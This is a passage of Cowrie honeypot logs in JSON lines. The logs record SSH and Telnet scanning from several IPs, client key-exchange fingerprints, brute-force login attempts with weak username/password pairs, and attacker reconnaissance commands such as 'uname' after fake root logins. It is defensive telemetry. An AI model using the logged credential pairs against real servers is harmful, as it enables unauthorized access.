.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:14:01.236403Z","src_ip":"51.79.164.132","session":"66012ec3485b"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T10:14:03.199455Z","src_ip":"51.79.164.132","session":"66012ec3485b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:04.809369Z","src_ip":"51.79.164.132","session":"66012ec3485b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49826,"dst_ip":"1.2.3.4","dst_port":22,"session":"59ba425c82b3","protocol":"ssh","message":"New connection: 51.79.164.132:49826 (1.2.3.4:22) [session: 59ba425c82b3]","sensor":"my-vps","timestamp":"2025-08-28T10:14:27.972622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:14:28.292136Z","src_ip":"51.79.164.132","session":"59ba425c82b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:14:28.312371Z","src_ip":"51.79.164.132","session":"59ba425c82b3"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:14:31.188942Z","src_ip":"51.79.164.132","session":"59ba425c82b3"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.457075Z","src_ip":"51.79.164.132","session":"59ba425c82b3"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":2589,"dst_ip":"1.2.3.4","dst_port":23,"session":"a9cf7c2a603a","protocol":"telnet","message":"New connection: 194.165.16.161:2589 (1.2.3.4:23) [session: a9cf7c2a603a]","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.488472Z"}
{"eventid":"cowrie.session.closed","duration":0.04307723045349121,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.531444Z","src_ip":"194.165.16.161","session":"a9cf7c2a603a"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":2606,"dst_ip":"1.2.3.4","dst_port":23,"session":"96e9e1a8ff6a","protocol":"telnet","message":"New connection: 194.165.16.161:2606 (1.2.3.4:23) [session: 96e9e1a8ff6a]","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.546246Z"}
{"eventid":"cowrie.session.closed","duration":0.016751527786254883,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.562923Z","src_ip":"194.165.16.161","session":"96e9e1a8ff6a"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":2721,"dst_ip":"1.2.3.4","dst_port":23,"session":"478418f7a436","protocol":"telnet","message":"New connection: 194.165.16.161:2721 (1.2.3.4:23) [session: 478418f7a436]","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.576785Z"}
{"eventid":"cowrie.session.closed","duration":0.01516413688659668,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:32.591872Z","src_ip":"194.165.16.161","session":"478418f7a436"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40658,"dst_ip":"1.2.3.4","dst_port":22,"session":"42ed6ebe68b4","protocol":"ssh","message":"New connection: 51.79.164.132:40658 (1.2.3.4:22) [session: 42ed6ebe68b4]","sensor":"my-vps","timestamp":"2025-08-28T10:14:54.781228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:14:55.290075Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:14:55.290764Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:14:58.514611Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:14:59.433024Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:14:59.433711Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:59.695299Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:14:59.696526Z","src_ip":"51.79.164.132","session":"42ed6ebe68b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5923,"dst_ip":"1.2.3.4","dst_port":22,"session":"feaf535de019","protocol":"ssh","message":"New connection: 212.227.235.229:5923 (1.2.3.4:22) [session: feaf535de019]","sensor":"my-vps","timestamp":"2025-08-28T10:15:03.486419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:15:03.487135Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:15:03.595061Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.login.failed","username":"admin","password":"alex1","message":"login attempt [admin/alex1] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:04.110275Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.login.failed","username":"admin","password":"akasha","message":"login attempt [admin/akasha] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:05.220751Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.login.failed","username":"admin","password":"agatha","message":"login attempt [admin/agatha] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:06.331040Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ace123","message":"login attempt [admin/ace123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:07.441426Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abstract","message":"login attempt [admin/abstract] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:08.551914Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:15:09.662511Z","src_ip":"212.227.235.229","session":"feaf535de019"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40564,"dst_ip":"1.2.3.4","dst_port":22,"session":"808da4fa4813","protocol":"ssh","message":"New connection: 51.79.164.132:40564 (1.2.3.4:22) [session: 808da4fa4813]","sensor":"my-vps","timestamp":"2025-08-28T10:15:22.359106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:15:22.799937Z","src_ip":"51.79.164.132","session":"808da4fa4813"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:15:22.921327Z","src_ip":"51.79.164.132","session":"808da4fa4813"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:26.536496Z","src_ip":"51.79.164.132","session":"808da4fa4813"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:15:28.117568Z","src_ip":"51.79.164.132","session":"808da4fa4813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e27a1c931d1","protocol":"ssh","message":"New connection: 212.227.235.229:21182 (1.2.3.4:22) [session: 6e27a1c931d1]","sensor":"my-vps","timestamp":"2025-08-28T10:15:28.794364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:15:28.795436Z","src_ip":"212.227.235.229","session":"6e27a1c931d1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:15:28.937231Z","src_ip":"212.227.235.229","session":"6e27a1c931d1"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:29.613763Z","src_ip":"212.227.235.229","session":"6e27a1c931d1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:15:30.761500Z","src_ip":"212.227.235.229","session":"6e27a1c931d1"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":49794,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8eddb184d3b","protocol":"ssh","message":"New connection: 116.198.207.211:49794 (1.2.3.4:22) [session: d8eddb184d3b]","sensor":"my-vps","timestamp":"2025-08-28T10:15:46.506775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:15:46.508497Z","src_ip":"116.198.207.211","session":"d8eddb184d3b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:15:46.693215Z","src_ip":"116.198.207.211","session":"d8eddb184d3b"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:15:47.252617Z","src_ip":"116.198.207.211","session":"d8eddb184d3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:15:47.638138Z","src_ip":"116.198.207.211","session":"d8eddb184d3b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:15:47.638849Z","src_ip":"116.198.207.211","session":"d8eddb184d3b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54908,"dst_ip":"1.2.3.4","dst_port":22,"session":"463459cd8bf6","protocol":"ssh","message":"New connection: 51.79.164.132:54908 (1.2.3.4:22) [session: 463459cd8bf6]","sensor":"my-vps","timestamp":"2025-08-28T10:15:48.703809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:15:48.970814Z","src_ip":"51.79.164.132","session":"463459cd8bf6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:15:48.971812Z","src_ip":"51.79.164.132","session":"463459cd8bf6"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T10:15:52.822435Z","src_ip":"51.79.164.132","session":"463459cd8bf6"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:15:54.394078Z","src_ip":"51.79.164.132","session":"463459cd8bf6"}
{"eventid":"cowrie.session.connect","src_ip":"147.185.132.144","src_port":62254,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb1f13f7e990","protocol":"ssh","message":"New connection: 147.185.132.144:62254 (1.2.3.4:22) [session: cb1f13f7e990]","sensor":"my-vps","timestamp":"2025-08-28T10:16:00.049082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T10:16:00.808140Z","src_ip":"147.185.132.144","session":"cb1f13f7e990"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T10:16:01.767497Z","src_ip":"147.185.132.144","session":"cb1f13f7e990"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:16:08.181771Z","src_ip":"147.185.132.144","session":"cb1f13f7e990"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52544,"dst_ip":"1.2.3.4","dst_port":22,"session":"5052d64fd05f","protocol":"ssh","message":"New connection: 51.79.164.132:52544 (1.2.3.4:22) [session: 5052d64fd05f]","sensor":"my-vps","timestamp":"2025-08-28T10:16:15.248092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:16:15.413149Z","src_ip":"51.79.164.132","session":"5052d64fd05f"}
